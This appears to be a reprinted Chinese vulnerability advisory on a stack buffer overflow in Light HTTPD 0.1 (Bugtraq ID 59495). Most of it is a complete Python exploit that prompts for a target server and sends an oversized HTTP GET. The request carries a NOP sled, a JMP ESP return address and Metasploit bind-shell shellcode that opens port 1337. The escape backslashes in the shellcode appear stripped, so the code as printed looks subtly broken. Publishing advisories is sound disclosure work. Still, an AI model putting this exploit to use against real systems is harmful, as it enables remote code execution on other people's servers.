Light HTTPD栈缓冲区溢出漏洞

发布日期：2013-04-25
更新日期：2013-04-27受影响系统：
Light HTTPD Light HTTPD 0.1
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 59495

Light HTTPD是改善ghttpd的项目，以包含服务器解析的元素、htaccess、内容管理、页内MySQL查询。

Light HTTPD在实现上存在缓冲区溢出漏洞，成功利用此漏洞可导致在应用上下文中执行任意代码或造成拒绝服务。

<*来源：Jacob Holcomb
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
import urllib2
from time import sleep #########################################################################################################################################
# Title************************Windows Light HTTPD v0.1 HTTP GET Buffer Overflow
# Discovered and Reported******24th of April, 2013
# Discovered/Exploited By******Jacob Holcomb/Gimppy042
# Software Vendor**************http://sourceforge.net/projects/lhttpd/？source=navbar
# Exploit/Advisory*************http://infosec42.blogspot.com/
# Software*********************Light HTTPD v0.1
# Tested Platform**************Windows XP Professional SP2
# Date*************************24/04/2013
#
#PS - This is a good piece of software to practice Stack Based Buffer Overflows if you curiouz and want to learnz
#########################################################################################################################################
# Exploit-DB Note: Offset 255 for Windows XP SP3
# jmp esp ntdll 0x7c31fcd8
# payload = "x90" * 255 + "xd8xfcx91x7c" + "x90" * 32 + shellcode def targURL（）: while True:

URL = raw_input（" [*] Please enter the URL of the Light HTTP server you would like to PWN. Ex. http://192.168.1.1 >"）
if len（URL）！= 0 and URL[0:7] == "http://":
break

else:
print " [！！！] Target URL cant be null and must contain http:// or https:// [！！！] "
sleep（1）

return str（URL）

def main（）: target = targURL（）
# msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=1337 R | msfencode -c 1 -e x86/shikata_ga_nai -b "x00x0ax0dxffx20" R
shellcode = "xb8x3bxafxc1x8axdbxcdxd9x74x24xf4x5ax29xc9"
shellcode += "xb1x56x83xc2x04x31x42x0fx03x42x34x4dx34x76"
shellcode += "xa2x18xb7x87x32x7bx31x62x03xa9x25xe6x31x7d"
shellcode += "x2dxaaxb9xf6x63x5fx4ax7axacx50xfbx31x8ax5f"
shellcode += "xfcxf7x12x33x3ex99xeex4ex12x79xcex80x67x78"
shellcode += "x17xfcx87x28xc0x8ax35xddx65xcex85xdcxa9x44"
shellcode += "xb5xa6xccx9bx41x1dxcexcbxf9x2ax98xf3x72x74"
shellcode += "x39x05x57x66x05x4cxdcx5dxfdx4fx34xacxfex61"
shellcode += "x78x63xc1x4dx75x7dx05x69x65x08x7dx89x18x0b"
shellcode += "x46xf3xc6x9ex5bx53x8dx39xb8x65x42xdfx4bx69"
shellcode += "x2fxabx14x6exaex78x2fx8ax3bx7fxe0x1ax7fxa4"
shellcode += "x24x46x24xc5x7dx22x8bxfax9ex8ax74x5fxd4x39"
shellcode += "x61xd9xb7x55x46xd4x47xa6xc0x6fx3bx94x4fxc4"
shellcode += "xd3x94x18xc2x24xdax33xb2xbbx25xbbxc3x92xe1"
shellcode += "xefx93x8cxc0x8fx7fx4dxecx5ax2fx1dx42x34x90"
shellcode += "xcdx22xe4x78x04xadxdbx99x27x67x6ax9exe9x53"
shellcode += "x3fx49x08x64xbaxb0x85x82xaexd2xc3x1dx46x11"
shellcode += "x30x96xf1x6ax12x8axaaxfcx2axc4x6cx02xabxc2"
shellcode += "xdfxafx03x85xabxa3x97xb4xacxe9xbfxbfx95x7a"
shellcode += "x35xaex54x1ax4axfbx0exbfxd9x60xcexb6xc1x3e"
shellcode += "x99x9fx34x37x4fx32x6exe1x6dxcfxf6xcax35x14"
shellcode += "xcbxd5xb4xd9x77xf2xa6x27x77xbex92xf7x2ex68"
shellcode += "x4cxbex98xdax26x68x76xb5xaexedxb4x06xa8xf1"
shellcode += "x90xf0x54x43x4dx45x6bx6cx19x41x14x90xb9xae"
shellcode += "xcfx10xd9x4cxc5x6cx72xc9x8cxccx1fxeax7bx12"
shellcode += "x26x69x89xebxddx71xf8xeex9ax35x11x83xb3xd3"
shellcode += "x15x30xb3xf1"

#7C941EED FFE4 JMP ESP ntdll.dll
payload = "x90" * 258 + "xEDx1Ex94x7C" + "x90" * 32 + shellcode
port = ":3000/"
sploit = target + port + payload

try:
print " [*] Preparing to send Evil PAYLoAd to %s！ [*] Payload Length: %d [*] Waiting..." % （target[7:], len（sploit））
httpRequest = urllib2.Request（sploit）
sploit = urllib2.urlopen（httpRequest, None, 6）
except（urllib2.URLError）:
print " [！！！] Error. Please check that the Light HTTP Server is online [！！！] "
except:
print " [！！！] The server did not respond, but the payload was sent. F！ng3r$ Cr0$$3d 4 c0d3 Ex3cut！0n！ [！！！] "

if __name__ == "__main__":
main（）建议：
--------------------------------------------------------------------------------
厂商补丁：

Light HTTPD
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://sourceforge.net/projects/lhttpd/？source=navbarphpMyAdmin preg_replace（）远程PHP代码执行（CVE-2013-3238）phpMyAdmin "filename_template" 远程代码执行（CVE-2013-3239）相关资讯 Light HTTPD安全漏洞 Light HTTPD 本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论
参与本评论即表明您已经阅读并接受上述条款